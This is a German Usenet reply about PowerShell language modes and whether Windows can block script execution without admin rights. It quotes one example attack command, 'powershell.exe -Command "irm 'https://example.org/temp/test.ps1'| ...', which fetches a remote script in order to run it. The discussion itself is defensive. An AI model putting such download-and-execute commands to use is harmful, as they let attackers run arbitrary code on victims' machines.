Groups | Search | Server Info | Keyboard shortcuts | Login | Register [http] [https] [nntp] [nntps]


Groups > de.comp.os.ms-windows.misc > #234855

Re: Powershell function ohne Admin-Rechte

From christian_dcomwm-ENTF@soemtron.de (Christian @Soemtron)
Newsgroups de.comp.os.ms-windows.misc
Subject Re: Powershell function ohne Admin-Rechte
Date 2026-01-19 11:41 +0200
Organization MB-NET.NET for Open-News-Network e.V.
Message-ID <HHAn1kvIVaB@point04.soemtron.de> (permalink)
References <HGAcmfIYVaB@point04.soemtron.de> <HGvkYaw2VaB@point04.soemtron.de> <msu780F2hujU1@mid.individual.net>

Show all headers | View raw


Christoph Schneegans <christoph@schneegans.de> schrieb:

> Ein Angreifer muss keine Datei ablegen. Es genügt, durch eine
> Sicherheitslücke in Browser oder E-Mail-Programm oder wie auch
> immer den kurzen Befehl
>
>   powershell.exe -Command "irm 'https://example.org/temp/test.ps1'| ...

Danke für die Erklärung. Das ist natürlich unschön. Da sollte es doch  
einfacher (für MS) sein, diese Art Scriptausführung generell zu  
unterbinden. Geht das irgendwie? Bei mir gibt es diesen Anwendungsfall  
definitiv nicht. Der erzwungene Umweg über lokale Speicherung ist doch  
ein einfaches und effektives Sicherheitsfeature.

> und dieses Skript kann im
> FullLanguage-Sprachmodus viel mehr und viel leichter Unfug treiben
> als im ConstrainedLanguage-Sprachmodus.

Trotzdem denke ich, wer den Aufwand des Suchens und Ausnutzens solcher  
Sicherheitslücken betreibt, hat null Probleme, den in Funktionen  
verpackten Code ohne das Gerüst auszuführen. Konsequenterweise sollte man  
vielleicht PS generell verbieten. Aber wahrscheinlich hat MS dafür  
gesorgt, daß dann auch Grundfunktionalität leidet.

> Ich mache das im Idealfall einmal pro Monat, und die beiden
> PowerShell-Sitzungen - eine mit Administrator-Rechten, eine ohne,
> aber beide im FullLanguage-Sprachmodus - bleiben offen, solange
> Windows läuft.

BTW: Da war doch IIRC mal was, daß es "einfach" möglich sein soll,  
gleichzeitig mit erhöhten Rechten laufende Prozesse zur Erweiterung der  
eigenen Rechte zu nutzen. Ist das eigentlich definitiv ausgeschlossen?

cu,
Christian

PGP Key available.

Back to de.comp.os.ms-windows.misc | Previous | NextPrevious in thread | Next in thread | Find similar


Thread

Powershell function ohne Admin-Rechte christian_dcomwm-ENTF@soemtron.de (Christian @Soemtron) - 2026-01-03 20:56 +0200
  Re: Powershell function ohne Admin-Rechte Werner Tann <wtann@gmx.at> - 2026-01-04 08:25 +0100
    Re: Powershell function ohne Admin-Rechte Werner Tann <wtann@gmx.at> - 2026-01-04 11:54 +0100
    Re: Powershell function ohne Admin-Rechte christian_dcomwm-ENTF@soemtron.de (Christian @Soemtron) - 2026-01-04 13:21 +0200
      Re: Powershell function ohne Admin-Rechte Arno Welzel <usenet@arnowelzel.de> - 2026-01-08 14:06 +0100
  Re: Powershell function ohne Admin-Rechte Joerg Gerlach <jger@gmx.de> - 2026-01-05 19:29 +0100
    Re: Powershell function ohne Admin-Rechte christian_dcomwm-ENTF@soemtron.de (Christian @Soemtron) - 2026-01-06 11:16 +0200
      Re: Powershell function ohne Admin-Rechte christian_dcomwm-ENTF@soemtron.de (Christian @Soemtron) - 2026-01-13 09:32 +0200
        Re: Powershell function ohne Admin-Rechte "Christoph Schneegans" <christoph@schneegans.de> - 2026-01-14 17:49 +0100
          Re: Powershell function ohne Admin-Rechte christian_dcomwm-ENTF@soemtron.de (Christian @Soemtron) - 2026-01-15 21:53 +0200
            Re: Powershell function ohne Admin-Rechte "Christoph Schneegans" <christoph@schneegans.de> - 2026-01-16 08:21 +0100
              Re: Powershell function ohne Admin-Rechte christian_dcomwm-ENTF@soemtron.de (Christian @Soemtron) - 2026-01-19 11:41 +0200
                Re: Powershell function ohne Admin-Rechte "Christoph Schneegans" <christoph@schneegans.de> - 2026-01-23 23:28 +0100

csiph-web